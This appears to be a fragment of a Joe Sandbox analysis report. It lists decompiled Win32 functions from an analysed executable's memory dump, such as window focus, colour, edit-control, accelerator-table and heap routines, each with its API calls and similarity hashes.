                                                                                                                                                              				if(IsWindowEnabled(_t16) != 0 && IsWindowVisible(_t16) != 0 && (GetWindowLongA(_t16, 0xfffffff0) & 0x00010000) != 0) {
                                                                                                                                                              					_t18 = _a8;
                                                                                                                                                              					if( *((intOrPtr*)(_t18 + 8)) == 0) {
                                                                                                                                                              						_t11 =  *_t18;
                                                                                                                                                              						if(_t11 != 0) {
                                                                                                                                                              							if(_t11 == _t16) {
                                                                                                                                                              								goto L8;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							SetFocus(_t16);
                                                                                                                                                              							_t15 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						SetFocus(_t16);
                                                                                                                                                              						_t15 = 0;
                                                                                                                                                              						L8:
                                                                                                                                                              						 *((intOrPtr*)(_t18 + 8)) = _t15;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t15;
                                                                                                                                                              			}







                                                                                                                                                              0x00405bb7
                                                                                                                                                              0x00405bbe
                                                                                                                                                              0x00405bc7
                                                                                                                                                              0x00405be5
                                                                                                                                                              0x00405bed
                                                                                                                                                              0x00405bfa
                                                                                                                                                              0x00405bfe
                                                                                                                                                              0x00405c0d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405c00
                                                                                                                                                              0x00405c01
                                                                                                                                                              0x00405c07
                                                                                                                                                              0x00405c07
                                                                                                                                                              0x00405bef
                                                                                                                                                              0x00405bf0
                                                                                                                                                              0x00405bf6
                                                                                                                                                              0x00405c0f
                                                                                                                                                              0x00405c0f
                                                                                                                                                              0x00405c0f
                                                                                                                                                              0x00405c12
                                                                                                                                                              0x00405c17

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Focus$EnabledLongVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1625685152-0
                                                                                                                                                              • Opcode ID: 1cc726b80f6959b4fb63163bba2464a36b234552e2cf5b930eb7b1ae95d43349
                                                                                                                                                              • Instruction ID: c6146cca50ef5e8f765ec7b6592dd4ff06736dc7ed718ebd510666ced0979e75
                                                                                                                                                              • Opcode Fuzzy Hash: 1cc726b80f6959b4fb63163bba2464a36b234552e2cf5b930eb7b1ae95d43349
                                                                                                                                                              • Instruction Fuzzy Hash: D0F049302087015FE7215F659D8876B72B8FF95755714843EF151F21D0C778D891DA1E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040416A(intOrPtr _a4, intOrPtr _a12, struct HDC__* _a16) {
                                                                                                                                                              				long _t9;
                                                                                                                                                              				long _t10;
                                                                                                                                                              				struct HDC__* _t17;
                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                              				struct HBRUSH__* _t25;
                                                                                                                                                              
                                                                                                                                                              				_t25 = 0xd0d0d0d1;
                                                                                                                                                              				if(_a12 == 0x138) {
                                                                                                                                                              					_t17 = _a16;
                                                                                                                                                              					_t23 = _a4;
                                                                                                                                                              					_t9 =  *(_t23 + 0x14);
                                                                                                                                                              					if(_t9 != 0xffffffff) {
                                                                                                                                                              						SetTextColor(_t17, _t9);
                                                                                                                                                              						if( *(_t23 + 0x10) == 0xffffffff) {
                                                                                                                                                              							SetBkColor(_t17, GetSysColor(0xf));
                                                                                                                                                              							_t25 = GetSysColorBrush(0xf);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t10 =  *(_t23 + 0x10);
                                                                                                                                                              					if(_t10 != 0xffffffff) {
                                                                                                                                                              						SetBkColor(_t17, _t10);
                                                                                                                                                              						_t25 =  *((intOrPtr*)(_t23 + 0x18));
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t25;
                                                                                                                                                              			}








                                                                                                                                                              0x00404173
                                                                                                                                                              0x00404178
                                                                                                                                                              0x0040417b
                                                                                                                                                              0x00404180
                                                                                                                                                              0x00404184
                                                                                                                                                              0x00404191
                                                                                                                                                              0x00404195
                                                                                                                                                              0x0040419f
                                                                                                                                                              0x004041ab
                                                                                                                                                              0x004041b5
                                                                                                                                                              0x004041b5
                                                                                                                                                              0x0040419f
                                                                                                                                                              0x004041b7
                                                                                                                                                              0x004041bd
                                                                                                                                                              0x004041c1
                                                                                                                                                              0x004041c3
                                                                                                                                                              0x004041c3
                                                                                                                                                              0x004041c8
                                                                                                                                                              0x004041cc

                                                                                                                                                              APIs
                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00404195
                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 004041A3
                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 004041AB
                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004041AF
                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 004041C1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushText
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3324192670-0
                                                                                                                                                              • Opcode ID: 54f08122a01e30bdfa786a13594a16f17e30ab6433d94faf13bd1f2d81774b56
                                                                                                                                                              • Instruction ID: d8e8ad06d9decbb24c27d3cc026bde09b1a35479a682271e2c605a4ee8a6c308
                                                                                                                                                              • Opcode Fuzzy Hash: 54f08122a01e30bdfa786a13594a16f17e30ab6433d94faf13bd1f2d81774b56
                                                                                                                                                              • Instruction Fuzzy Hash: CDF044B1100304ABD220AB299C48967B3FCEBA4331F004B36FA75E32D1C774AC558A66
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004043AE(intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                                                                                                                                              				long _t23;
                                                                                                                                                              				signed int _t27;
                                                                                                                                                              				struct HWND__* _t29;
                                                                                                                                                              				struct HWND__** _t31;
                                                                                                                                                              				void* _t32;
                                                                                                                                                              
                                                                                                                                                              				_t31 = E0040642D( *0x40b428);
                                                                                                                                                              				if( *0x40b30c == 0) {
                                                                                                                                                              					memset(0x40b278, 0, 0x94);
                                                                                                                                                              					 *0x40b278 = 2;
                                                                                                                                                              					 *0x40b27c = 0x94;
                                                                                                                                                              					 *0x40b280 = E004042DD;
                                                                                                                                                              					 *0x40b2f0 = E00404680;
                                                                                                                                                              					 *0x40b2f4 = E004046DA;
                                                                                                                                                              					 *0x40b284 = E00404700;
                                                                                                                                                              					 *0x40b30c = 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a24 == 0) {
                                                                                                                                                              					_a24 = 0x409000;
                                                                                                                                                              				}
                                                                                                                                                              				_t27 = _a28;
                                                                                                                                                              				_t28 = _t27 | 0x50030080;
                                                                                                                                                              				_t29 = CreateWindowExA( !(_t27 >> 8) & 0x00000200, "Edit", _a24, _t27 | 0x50030080, _a8, _a12, _a16, _a20,  *_t31, 0xffffffff,  *0x40b0fc, 0);
                                                                                                                                                              				if(_t29 != 0) {
                                                                                                                                                              					_t32 = E0040662C( *0x40b424, _a4);
                                                                                                                                                              					_t23 = SetWindowLongA(_t29, 0xfffffffc, E00404358);
                                                                                                                                                              					 *(_t32 + 0x14) =  *(_t32 + 0x14) | 0xffffffff;
                                                                                                                                                              					 *(_t32 + 0x10) =  *(_t32 + 0x10) | 0xffffffff;
                                                                                                                                                              					 *0x40b270 = _t23;
                                                                                                                                                              					_t29 = E004047BB(_t28, _a4, _t32, _t29, 0x40b278);
                                                                                                                                                              				}
                                                                                                                                                              				return _t29;
                                                                                                                                                              			}








                                                                                                                                                              0x004043c6
                                                                                                                                                              0x004043cd
                                                                                                                                                              0x004043d8
                                                                                                                                                              0x004043e0
                                                                                                                                                              0x004043ea
                                                                                                                                                              0x004043f0
                                                                                                                                                              0x004043fa
                                                                                                                                                              0x00404404
                                                                                                                                                              0x0040440e
                                                                                                                                                              0x00404418
                                                                                                                                                              0x00404418
                                                                                                                                                              0x00404426
                                                                                                                                                              0x00404428
                                                                                                                                                              0x00404428
                                                                                                                                                              0x0040442f
                                                                                                                                                              0x00404440
                                                                                                                                                              0x0040446c
                                                                                                                                                              0x00404470
                                                                                                                                                              0x00404488
                                                                                                                                                              0x0040448a
                                                                                                                                                              0x00404490
                                                                                                                                                              0x00404494
                                                                                                                                                              0x0040449e
                                                                                                                                                              0x004044a8
                                                                                                                                                              0x004044a8
                                                                                                                                                              0x004044b0

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004043D8
                                                                                                                                                              • CreateWindowExA.USER32(?,Edit,00000000,?,?,?,?,?,00000000,000000FF,00000000), ref: 00404466
                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000FC,Function_00004358), ref: 0040448A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CreateLongmemset
                                                                                                                                                              • String ID: Edit
                                                                                                                                                              • API String ID: 2917088559-554135844
                                                                                                                                                              • Opcode ID: 447a2ae06f6b165a5cefae3f0fe963aec8ed8a20647a4be4382fc43a3d524c26
                                                                                                                                                              • Instruction ID: 6d6bdd9e0c8eed947640fc1b11ecc7fcd9f2bd5d8b727347204d49e96c7c13b5
                                                                                                                                                              • Opcode Fuzzy Hash: 447a2ae06f6b165a5cefae3f0fe963aec8ed8a20647a4be4382fc43a3d524c26
                                                                                                                                                              • Instruction Fuzzy Hash: 7A217CB1500205ABDB215F12ED09F5B3FB5EB84325F10823EF960B62E1D77988249B9C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403A79(void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				void* _t8;
                                                                                                                                                              				long _t16;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              
                                                                                                                                                              				_t17 = E00407750(0x104, _a4);
                                                                                                                                                              				_t16 = GetModuleFileNameA( *0x40b0fc, _t17, 0x104);
                                                                                                                                                              				if(strcmp(_t17, "\\\\?\\") == 0) {
                                                                                                                                                              					_t2 = _t16 - 4; // -4
                                                                                                                                                              					_t3 = _t17 + 4; // 0x4
                                                                                                                                                              					memmove(_t17, _t3, _t2);
                                                                                                                                                              					_t16 = _t16 - 4;
                                                                                                                                                              				}
                                                                                                                                                              				_t8 = E004077F0(0x104 - _t16);
                                                                                                                                                              				 *((char*)(_t16 + _t17)) = 0;
                                                                                                                                                              				return _t8;
                                                                                                                                                              			}






                                                                                                                                                              0x00403a8c
                                                                                                                                                              0x00403aa1
                                                                                                                                                              0x00403aac
                                                                                                                                                              0x00403aae
                                                                                                                                                              0x00403ab2
                                                                                                                                                              0x00403ab7
                                                                                                                                                              0x00403abf
                                                                                                                                                              0x00403abf
                                                                                                                                                              0x00403ac5
                                                                                                                                                              0x00403aca
                                                                                                                                                              0x00403ad1

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(02260000,00000001,022606F0,000040FF), ref: 00407797
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,?,?,?,00000000,00401B51,00000000,00000000,00000000,00000000,00000001,00000001,00000001,00000000), ref: 00403A95
                                                                                                                                                              • strcmp.MSVCRT ref: 00403AA3
                                                                                                                                                              • memmove.MSVCRT ref: 00403AB7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateFileHeapModuleNamememmovestrcmp
                                                                                                                                                              • String ID: \\?\
                                                                                                                                                              • API String ID: 1538048364-4282027825
                                                                                                                                                              • Opcode ID: 0d894860d998a38802a0c339f33e2d9615a6d37d521d3afdbe7a484fcb4a0eb9
                                                                                                                                                              • Instruction ID: b2d6bd18301c6a615e078c624f6e571f893afb971f9df6f800e3a030ac3227e0
                                                                                                                                                              • Opcode Fuzzy Hash: 0d894860d998a38802a0c339f33e2d9615a6d37d521d3afdbe7a484fcb4a0eb9
                                                                                                                                                              • Instruction Fuzzy Hash: 90F027B36053016AD31066769D89E9B6B9CDF94364F104437F500E2182E638A91083B9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00404E09(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              				signed int _t55;
                                                                                                                                                              				struct tagACCEL* _t57;
                                                                                                                                                              				struct HACCEL__* _t64;
                                                                                                                                                              				int _t69;
                                                                                                                                                              				struct tagACCEL* _t82;
                                                                                                                                                              				void* _t84;
                                                                                                                                                              
                                                                                                                                                              				_v8 = 3;
                                                                                                                                                              				_t84 = E00406690( *0x40b42c, _a4);
                                                                                                                                                              				if(_t84 != 0) {
                                                                                                                                                              					if((_a8 & 0x00010000) != 0) {
                                                                                                                                                              						_v8 = 7;
                                                                                                                                                              					}
                                                                                                                                                              					if((_a8 & 0x00020000) != 0) {
                                                                                                                                                              						_v8 = _v8 | 0x00000008;
                                                                                                                                                              					}
                                                                                                                                                              					if((_a8 & 0x00040000) != 0) {
                                                                                                                                                              						_v8 = _v8 | 0x00000010;
                                                                                                                                                              					}
                                                                                                                                                              					_t69 =  *(_t84 + 0x10);
                                                                                                                                                              					_a8 = _a8 & 0x0000ffff;
                                                                                                                                                              					_t54 = 0;
                                                                                                                                                              					if(_t69 <= 0) {
                                                                                                                                                              						L12:
                                                                                                                                                              						_t55 = _t69 + 1;
                                                                                                                                                              						 *(_t84 + 0x10) = _t55;
                                                                                                                                                              						if(_t55 != 1) {
                                                                                                                                                              							_t57 = RtlReAllocateHeap( *0x40b0f8, 0,  *(_t84 + 4), _t55 * 6);
                                                                                                                                                              						} else {
                                                                                                                                                              							_t57 = RtlAllocateHeap( *0x40b0f8, 0, 6);
                                                                                                                                                              						}
                                                                                                                                                              						 *(_t84 + 4) = _t57;
                                                                                                                                                              						 *((short*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 4)) = _a8;
                                                                                                                                                              						 *((short*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 2)) = _a12;
                                                                                                                                                              						 *((char*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 6)) = _v8;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t82 =  *(_t84 + 4);
                                                                                                                                                              						while(_a8 != (_t82->key & 0x0000ffff) || _v8 != ( *_t82 & 0x000000ff)) {
                                                                                                                                                              							_t54 = _t54 + 1;
                                                                                                                                                              							_t82 = _t82 + 6;
                                                                                                                                                              							if(_t54 < _t69) {
                                                                                                                                                              								continue;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L12;
                                                                                                                                                              							}
                                                                                                                                                              							goto L17;
                                                                                                                                                              						}
                                                                                                                                                              						 *((short*)( &( *(_t84 + 4)->cmd) + _t54 * 6)) = _a12;
                                                                                                                                                              					}
                                                                                                                                                              					L17:
                                                                                                                                                              					_t64 =  *(_t84 + 8);
                                                                                                                                                              					if(_t64 != 0) {
                                                                                                                                                              						DestroyAcceleratorTable(_t64);
                                                                                                                                                              					}
                                                                                                                                                              					 *(_t84 + 8) = CreateAcceleratorTableA( *(_t84 + 4),  *(_t84 + 0x10));
                                                                                                                                                              				}
                                                                                                                                                              				return  *(_t84 + 8);
                                                                                                                                                              			}











                                                                                                                                                              0x00404e11
                                                                                                                                                              0x00404e23
                                                                                                                                                              0x00404e27
                                                                                                                                                              0x00404e34
                                                                                                                                                              0x00404e36
                                                                                                                                                              0x00404e36
                                                                                                                                                              0x00404e44
                                                                                                                                                              0x00404e46
                                                                                                                                                              0x00404e46
                                                                                                                                                              0x00404e51
                                                                                                                                                              0x00404e53
                                                                                                                                                              0x00404e53
                                                                                                                                                              0x00404e57
                                                                                                                                                              0x00404e5a
                                                                                                                                                              0x00404e61
                                                                                                                                                              0x00404e66
                                                                                                                                                              0x00404e84
                                                                                                                                                              0x00404e84
                                                                                                                                                              0x00404e8a
                                                                                                                                                              0x00404e8d
                                                                                                                                                              0x00404ec1
                                                                                                                                                              0x00404e8f
                                                                                                                                                              0x00404e99
                                                                                                                                                              0x00404e99
                                                                                                                                                              0x00404ecb
                                                                                                                                                              0x00404ed7
                                                                                                                                                              0x00404ee9
                                                                                                                                                              0x00404efa
                                                                                                                                                              0x00404e68
                                                                                                                                                              0x00404e68
                                                                                                                                                              0x00404e6b
                                                                                                                                                              0x00404e7c
                                                                                                                                                              0x00404e7d
                                                                                                                                                              0x00404e82
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404e82
                                                                                                                                                              0x00404eab
                                                                                                                                                              0x00404eab
                                                                                                                                                              0x00404efe
                                                                                                                                                              0x00404efe
                                                                                                                                                              0x00404f04
                                                                                                                                                              0x00404f07
                                                                                                                                                              0x00404f07
                                                                                                                                                              0x00404f19
                                                                                                                                                              0x00404f19
                                                                                                                                                              0x00404f21

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000006), ref: 00404E99
                                                                                                                                                              • DestroyAcceleratorTable.USER32(?), ref: 00404F07
                                                                                                                                                              • CreateAcceleratorTableA.USER32(?,?,?), ref: 00404F13
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AcceleratorTable$AllocateCreateDestroyHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1846328917-0
                                                                                                                                                              • Opcode ID: 6d5d5c72cacb5ceb41d0a126b86641f2415a59e02c6a290ff14f8ae474ad7ed6
                                                                                                                                                              • Instruction ID: bc9dcee14bbf4dd975b3e87a1cfaf1458909dabdc56a66c9757580d18e599811
                                                                                                                                                              • Opcode Fuzzy Hash: 6d5d5c72cacb5ceb41d0a126b86641f2415a59e02c6a290ff14f8ae474ad7ed6
                                                                                                                                                              • Instruction Fuzzy Hash: E8319E70100702DBC724CF24CA45A6ABBF5FF94704F10C82DE96AAB6A0E375EA50DB48
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00407650(void* __ecx, void** _a4, char* _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				void* _t42;
                                                                                                                                                              
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(_a8 == 0) {
                                                                                                                                                              					if( *_a4 != 0) {
                                                                                                                                                              						_t21 =  *0x40b3b4; // 0x2260000
                                                                                                                                                              						HeapFree(_t21, 1,  *_a4);
                                                                                                                                                              						 *_a4 = 0;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_v8 = strlen(_a8);
                                                                                                                                                              					if( *_a4 != 0) {
                                                                                                                                                              						_t42 =  *0x40b3b4; // 0x2260000
                                                                                                                                                              						 *_a4 = RtlReAllocateHeap(_t42, 1,  *_a4, _v8 + 5);
                                                                                                                                                              					} else {
                                                                                                                                                              						_t29 =  *0x40b3b4; // 0x2260000
                                                                                                                                                              						 *_a4 = RtlAllocateHeap(_t29, 1, _v8 + 5);
                                                                                                                                                              					}
                                                                                                                                                              					E00407810(_a4,  *_a4, _a8, _v8);
                                                                                                                                                              				}
                                                                                                                                                              				return _v8 + 1;
                                                                                                                                                              			}







                                                                                                                                                              0x00407654
                                                                                                                                                              0x0040765f
                                                                                                                                                              0x004076d0
                                                                                                                                                              0x004076da
                                                                                                                                                              0x004076e0
                                                                                                                                                              0x004076e9
                                                                                                                                                              0x004076e9
                                                                                                                                                              0x00407661
                                                                                                                                                              0x0040766d
                                                                                                                                                              0x00407676
                                                                                                                                                              0x004076a3
                                                                                                                                                              0x004076b3
                                                                                                                                                              0x00407678
                                                                                                                                                              0x00407681
                                                                                                                                                              0x00407690
                                                                                                                                                              0x00407690
                                                                                                                                                              0x004076c3
                                                                                                                                                              0x004076c3
                                                                                                                                                              0x004076f8

                                                                                                                                                              APIs
                                                                                                                                                              • strlen.MSVCRT ref: 00407665
                                                                                                                                                              • RtlAllocateHeap.NTDLL(02260000,00000001,-00000005), ref: 00407687
                                                                                                                                                              • RtlReAllocateHeap.NTDLL(02260000,00000001,?,-00000005), ref: 004076AA
                                                                                                                                                              • HeapFree.KERNEL32(02260000,00000001), ref: 004076E0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Allocate$Freestrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3543670626-0
                                                                                                                                                              • Opcode ID: 00b5e7f4474d1610928f4fd92f534d406abcc27283626e612fe652c0a87dc2ac
                                                                                                                                                              • Instruction ID: 9a70041e5ee9e3aa3c8356125c7a9a49bf0f5e47ff7a9399fb27335f50f92b23
                                                                                                                                                              • Opcode Fuzzy Hash: 00b5e7f4474d1610928f4fd92f534d406abcc27283626e612fe652c0a87dc2ac
                                                                                                                                                              • Instruction Fuzzy Hash: F0215EB4A00208EFCB00CF58C984FAA37B5EF88314F20C469F8059B395D776AE41DB99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405C1A(struct HWND__* _a4, intOrPtr* _a8) {
                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                              				struct HWND__* _t14;
                                                                                                                                                              				intOrPtr* _t18;
                                                                                                                                                              
                                                                                                                                                              				_t14 = _a4;
                                                                                                                                                              				_t16 = 1;
                                                                                                                                                              				if(IsWindowEnabled(_t14) != 0 && IsWindowVisible(_t14) != 0 && (GetWindowLongA(_t14, 0xfffffff0) & 0x00010000) != 0) {
                                                                                                                                                              					_t18 = _a8;
                                                                                                                                                              					if( *_t18 == _t14) {
                                                                                                                                                              						_t12 =  *(_t18 + 4);
                                                                                                                                                              						if(_t12 != 0) {
                                                                                                                                                              							SetFocus(_t12);
                                                                                                                                                              							 *((intOrPtr*)(_t18 + 0xc)) = 1;
                                                                                                                                                              							_t16 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					 *(_t18 + 4) = _t14;
                                                                                                                                                              				}
                                                                                                                                                              				return _t16;
                                                                                                                                                              			}






                                                                                                                                                              0x00405c1b
                                                                                                                                                              0x00405c23
                                                                                                                                                              0x00405c2c
                                                                                                                                                              0x00405c4a
                                                                                                                                                              0x00405c50
                                                                                                                                                              0x00405c52
                                                                                                                                                              0x00405c57
                                                                                                                                                              0x00405c5a
                                                                                                                                                              0x00405c60
                                                                                                                                                              0x00405c63
                                                                                                                                                              0x00405c63
                                                                                                                                                              0x00405c57
                                                                                                                                                              0x00405c65
                                                                                                                                                              0x00405c68
                                                                                                                                                              0x00405c6d

                                                                                                                                                              APIs
                                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 00405C24
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00405C2F
                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00405C3C
                                                                                                                                                              • SetFocus.USER32(?), ref: 00405C5A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$EnabledFocusLongVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 599048109-0
                                                                                                                                                              • Opcode ID: cb1c87f19132670d348f43589caefb14191d0db9c4e993ae8d8c67d75e8ba143
                                                                                                                                                              • Instruction ID: 9b191372e45709e83f1cce7d42dee75ff49b7deadfcab72b6d2fd196ff601546
                                                                                                                                                              • Opcode Fuzzy Hash: cb1c87f19132670d348f43589caefb14191d0db9c4e993ae8d8c67d75e8ba143
                                                                                                                                                              • Instruction Fuzzy Hash: 04F0DA752087019BE7209F36DE8CA57B7ACFB94751718843AB496E3290CB38D851CA69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
